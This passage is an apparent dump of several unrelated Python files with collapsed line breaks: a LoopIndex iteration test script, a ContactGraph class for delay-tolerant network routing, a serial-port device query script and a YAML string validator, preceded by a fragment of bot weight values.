0.829240161937682] bot0_bias_layer_three = [0.2971151712515807, 0.44049196814586233, 0.020480305711626956, 0.8409035705395105, 0.3335528017310272, 0.894302479392005, 0.9459298378741281, 0.3640146372756523] bot0_fitness = 49.94596758288455 bot0_num = 0
python
# -*- coding: utf-8 -*- from loop_index import LoopIndex from os import system def backward_iter_console_test(num_list, jump, start=None): test_announcement = "Backward iteration by " + str(jump) if start == None: start = len(num_list)-1 else: test_announcement += " from " + str(start) print(test_announcement) index = LoopIndex(0, -jump, start) print(repr(index)) while index.check_bounds(): i = index.get_value() print(str(i) + ": " + str(num_list[i])) index.increment() print("Next index: " + str(index._index)) def forward_iter_console_test(num_list, jump, start=0): test_announcement = "Forward iteration by " + str(jump) if start != 0: test_announcement += " from " + str(start) print(test_announcement) index = LoopIndex(len(num_list), jump, start) print(repr(index)) while index.check_bounds(): i = index.get_value() print("Value at " + str(i) + ": " + str(num_list[i])) index.increment() print("Next index: " + str(index._index)) def generate_range_list(length): return [n for n in range(length)] def test_backward_iteration(num_list, jump, start=None): if start == None: start = len(num_list)-1 visited_items = list() index = LoopIndex(0, -jump, start) while index.iterate(): i = index.get_value() visited_items.append(num_list[i]) return visited_items def test_forward_iteration(num_list, jump, start=0): visited_items = list() index = LoopIndex(len(num_list), jump, start) while index.iterate(): i = index.get_value() visited_items.append(num_list[i]) return visited_items def generate_range_list(length): return [n for n in range(length)] # [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] list10 = generate_range_list(11) # [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11] list11 = generate_range_list(12) # Forward tests from index 0 with an even length assert(test_forward_iteration(list11, 1) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]) assert(test_forward_iteration(list11, 2) == [0, 2, 4, 6, 8, 10]) assert(test_forward_iteration(list11, 3) == [0, 3, 6, 9]) assert(test_forward_iteration(list11, 4) == [0, 4, 8]) assert(test_forward_iteration(list11, 5) == [0, 5, 10]) assert(test_forward_iteration(list11, 6) == [0, 6]) assert(test_forward_iteration(list11, 7) == [0, 7]) assert(test_forward_iteration(list11, 11) == [0, 11]) assert(test_forward_iteration(list11, 12) == [0]) assert(test_forward_iteration(list11, 13) == [0]) # Forward tests from index 0 with an odd length assert(test_forward_iteration(list10, 1) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) assert(test_forward_iteration(list10, 2) == [0, 2, 4, 6, 8, 10]) assert(test_forward_iteration(list10, 3) == [0, 3, 6, 9]) assert(test_forward_iteration(list10, 4) == [0, 4, 8]) assert(test_forward_iteration(list10, 5) == [0, 5, 10]) assert(test_forward_iteration(list10, 6) == [0, 6]) assert(test_forward_iteration(list10, 7) == [0, 7]) assert(test_forward_iteration(list10, 11) == [0]) assert(test_forward_iteration(list10, 12) == [0]) # Forward tests from other indices # Iterate by 3 from 2 assert(test_forward_iteration(list11, 3, 2) == [2, 5, 8, 11]) # Iterate by 5 from 1 assert(test_forward_iteration(list11, 5, 1) == [1, 6, 11]) # Iterate by 4 from 5 assert(test_forward_iteration(list11, 4, 5) == [5, 9]) # Iterate by 8 from 7 assert(test_forward_iteration(list11, 8, 7) == [7]) # Backward tests from last index with an even length assert(test_backward_iteration(list11, 1) == [11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) assert(test_backward_iteration(list11, 2) == [11, 9, 7, 5, 3, 1]) assert(test_backward_iteration(list11, 3) == [11, 8, 5, 2]) assert(test_backward_iteration(list11, 4) == [11, 7, 3]) assert(test_backward_iteration(list11, 5) == [11, 6, 1]) assert(test_backward_iteration(list11, 6) == [11, 5]) assert(test_backward_iteration(list11, 7) == [11, 4]) assert(test_backward_iteration(list11, 11) == [11, 0]) assert(test_backward_iteration(list11, 12) == [11]) assert(test_backward_iteration(list11, 13) == [11]) # Backward tests from last index with an odd length assert(test_backward_iteration(list10, 1) == [10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0]) assert(test_backward_iteration(list10, 2) == [10, 8, 6, 4, 2, 0]) assert(test_backward_iteration(list10, 3) == [10, 7, 4, 1]) assert(test_backward_iteration(list10, 4) == [10, 6, 2]) assert(test_backward_iteration(list10, 5) == [10, 5, 0]) assert(test_backward_iteration(list10, 6) == [10, 4]) assert(test_backward_iteration(list10, 7) == [10, 3]) assert(test_backward_iteration(list10, 10) == [10, 0]) assert(test_backward_iteration(list10, 11) == [10]) assert(test_backward_iteration(list10, 12) == [10]) # Backward tests from other indices # Iterate by -3 from 10 assert(test_backward_iteration(list11, 3, 10) == [10, 7, 4, 1]) # Iterate by -4 from 9 assert(test_backward_iteration(list11, 4, 9) == [9, 5, 1]) # Iterate by -5 from 7 assert(test_backward_iteration(list11, 5, 7) == [7, 2]) # Iterate by -6 from 4 assert(test_backward_iteration(list11, 6, 4) == [4]) if __name__ == "__main__": print("Testing with the following list: " + str(list11) + "\n") forward_iter_console_test(list11, 3, 2) print() forward_iter_console_test(list11, 2) print() backward_iter_console_test(list11, 2) print() backward_iter_console_test(list11, 4, 10) system("pause")
python
"""Implementation of a contact graph object.""" from collections import OrderedDict, namedtuple import math import networkx as nx from .contact_plan import ContactIdentifier, ContactPlan # ContactIdentifier object for better readability and access to identifer # tuple object. NeighborLists = namedtuple('NeighborLists', ['successors', 'predecessors']) class ContactGraph: """Represents a specific contact graph in the CGR context. The :class:`ContactGraph` object represents the same information than a :class:`ContactPlan` object, but in a different form. It can be generated based on any :class:`ContactPlan` and is subsequently used for CGR routing purposes. Args: contact_plan (pydtnsim.ContactPlan): The ContactPlan object posing the information base for the new object. Defaults to None. """ @staticmethod def _create_graph_edges(graph): """Create the edges within all nodes of the contact graph. Args: graph (dict): The graph object that already contains the nodes and that's successor/predecessor lists should be generated. """ node_list = list(graph.keys()) # Now that we have all nodes, start generating the edges which is quite # expensive but we only have to do it once for all nodes and all times # (as long as the contact plan is not changing) for node1 in graph: # Remove the currently investigated node node_list.remove(node1) for node2 in node_list: # Check if the end node of the first contact is the start node # of the second contact and the next contact is not returning # to the initial node if (node1.to_node == node2.from_node and node1.from_node != node2.to_node): # If that is the case, evaluate if the timing adds up if node2.to_time > node1.from_time: # Add edge from node1 to node2 (directed, by adding # link to node2 to successor list of node1), also add # node1 to list of predecessors of node2 graph[node1].successors.append(node2) graph[node2].predecessors.append(node1) # Also check if the end node of the second contact is the # start node of the first contact and the next contact is not # returning to the initial node elif (node2.to_node == node1.from_node and node2.from_node != node1.to_node): # If that is the case, evaluate if the timing adds up if node1.to_time > node2.from_time: # Add edge from node1 to node2 (directed, by adding # link to node2 to successor list of node1), also add # node1 to list of predecessors of node2 graph[node2].successors.append(node1) graph[node1].predecessors.append(node2) # Sort the predecessor/successor lists by the hash value of the # nodes. for node in graph: graph[node].successors.sort( key=(lambda c: (c.to_time, hash(c.to_node))), reverse=True) graph[node].predecessors.sort( key=(lambda c: (c.to_time, hash(c.from_node))), reverse=True) @staticmethod def _generate_contact_graph(contact_plan): """Generate a contact graph based on a given contact plan. Args: contact_plan (ContactPlan): The contact plan representation used for the contact graph generation. Returns: OrderedDict: The contact graph as ordered dictionary Raises: ValueError: If the function is called with an object other than ContactPlan. """ if not isinstance(contact_plan, ContactPlan): raise ValueError("The loaded contact plan is not a ContactPlan " "object") # TODO: Normal dictionaries are ordered in Python +3.7 graph = OrderedDict() for contact in contact_plan.plan['contacts']: # Add item to graph: # - Key: from_node, to_node, start_time, end_time, datarate, delay # - Value: NeighborLists(namedtuple) graph[contact] = NeighborLists( successors=list(), predecessors=list()) # Create identifier for terminal node terminal_node = ContactIdentifier( from_node=contact.to_node, to_node=contact.to_node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create identifier for root node root_node = ContactIdentifier( from_node=contact.from_node, to_node=contact.from_node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create terminal node (if not existing yet) if terminal_node not in graph: graph[terminal_node] = NeighborLists( successors=list(), predecessors=list()) # Create root node (if not existing yet) if root_node not in graph: graph[root_node] = NeighborLists( successors=list(), predecessors=list()) for node in contact_plan.plan['nodes']: # Create identifier for terminal node nominal_node = ContactIdentifier( from_node=node, to_node=node, from_time=0, to_time=math.inf, datarate=math.inf, delay=0) # Create root node (if not existing yet) if nominal_node not in graph: graph[nominal_node] = NeighborLists( successors=list(), predecessors=list()) # Return the generated graph object return graph def __init__(self, contact_plan=None): if contact_plan is not None: self.graph = ContactGraph._generate_contact_graph(contact_plan) self._create_graph_edges(self.graph) self.hashes = self._generate_hashes() # Copy the coldspot/hotspot information from the ContactPlan self.hotspots = contact_plan.hotspots self.coldspots = contact_plan.coldspots self.capacity_storage = None else: self.graph = OrderedDict() self.hashes = OrderedDict() def remove_contact_node(self, contact): """Remove single contact from graph. Args: contact (ContactIdentifier): Contact identifier referencing the contact to be removed. Raises: ValueError: If the contact identifier is not a ContactIdentifier named tuple or if the contact identifier is not in the current graph. """ # Check if contact is the right type if not isinstance(contact, ContactIdentifier): raise ValueError("ContactIdentifier named tuple should be used \ for accessing ContactGraph object") if contact not in self.graph: raise ValueError("Contact specified by identifier not part of \ graph") # Remove the reference to the contact (i.e. the edge) from all # predecessors of this contact for pred in self.graph[contact].predecessors: self.graph[pred].successors.remove(contact) # Remove the reference to the contact (i.e. the edge) from all # successors of this contact for succ in self.graph[contact].successors: self.graph[succ].predecessors.remove(contact) # Remove node from graph dict del self.graph[contact] del self.hashes[contact] def add_contact_node(self, contact): """Add contact node to graph object. Args: contact (ContactIdentifier): Contact that should be added to the contact graph. Raises: ValueError: When no ContactIdentifier named tuple is used for this operation. """ # Check if contact is the right type if not isinstance(contact, ContactIdentifier): raise ValueError("ContactIdentifier named tuple should be used \ for accessing ContactGraph object") # Add node to graph dictionary self.graph[contact] = NeighborLists( successors=list(), predecessors=list()) self.hashes[contact] = (hash(contact.to_node), hash(contact.from_node)) # Add contact successors and predecessors for cont in self.graph: if cont == contact: # Ignore self reference continue # Check if contact can be successor or predecessor if cont.to_time > contact.from_time and \ cont.from_node == contact.to_node: self.graph[contact].successors.append(cont) self.graph[cont].predecessors.append(contact) if contact.to_time > cont.from_time and \ contact.from_node == cont.to_node: self.graph[contact].predecessors.append(cont) self.graph[cont].successors.append(contact) def remove_topology_node(self, node_identifier): """Remove a topological node from the ContactGraph object. Can be used to e.g. purge an entire ground station from the graph. Args: node_identifier (string): Identifier of the topological node. """ # Iterate over all contacts of graph and check if topological node # is involved (either as source or destination node of a contact) for contact in list(self.graph.keys()): if node_identifier in (contact.from_node, contact.to_node): # Call function to remove applicable contact nodes from graph self.remove_contact_node(contact) def _generate_hashes(self): """Generate hashes for all nodes in graph. Returns: OrderedDict: A dictionary with the hashes of all nodes of the graph. """ hashes = OrderedDict() for contact in self.graph: hashes[contact] = (hash(contact.to_node), hash(contact.from_node)) return hashes def reinitialize(self, contact_plan=None): """Delete and regenerate the internal contact graph representation. Args: contact_plan (pydtnsim.ContactPlan): The ContactPlan object used for the new graph generation. Defaults to None. """ # Delete the current information del self.graph if contact_plan is not None: # Reinitialize the internal representation of the contact graph self.graph = self._generate_contact_graph(contact_plan) self.hashes = self._generate_hashes() else: self.graph = OrderedDict() self.hashes = OrderedDict() def get_networx_contact_graph(self, ignore_notional_nodes=False): """Provide contact graph as :mod:`networkx` :class:`DiGraph`. Args: ignore_notional_nodes (type): Return a networkx contact graph representation that does not include the notional nodes. Defaults to False. Returns: DiGraph: A networkx graph representation of the contact graph. """ # Create empty DiGraph object graph = nx.DiGraph() # Add all nodes in the topology to the graph for node in self.graph.keys(): if (ignore_notional_nodes and node.from_node == node.to_node): continue graph.add_node(str(node)) # Add edges between the contact nodes for node in self.graph.keys(): for successor in self.graph[node].successors: graph.add_edge(str(node), str(successor)) # Return graph return graph
python
#!/usr/bin/python import serial, time ser = serial.Serial('/dev/ttyUSB0') # open serial port def comm(msg): print("msg: %s" % msg) ser.write("XA/%s\r\n" % msg ) resp = ser.readline() print resp print(ser.name) # check which port was really used msgs = ['kamu', 'N?', 'B?', 'T?'] # test he device for msg in msgs: time.sleep(1) comm(msg) ser.close()
python
from .comparable import Comparable class String(Comparable): @classmethod def validate(cls, yaml_node): super().validate(yaml_node) if not isinstance(yaml_node.value, str): cls.abort("Expected string input", yaml_node.loc)
python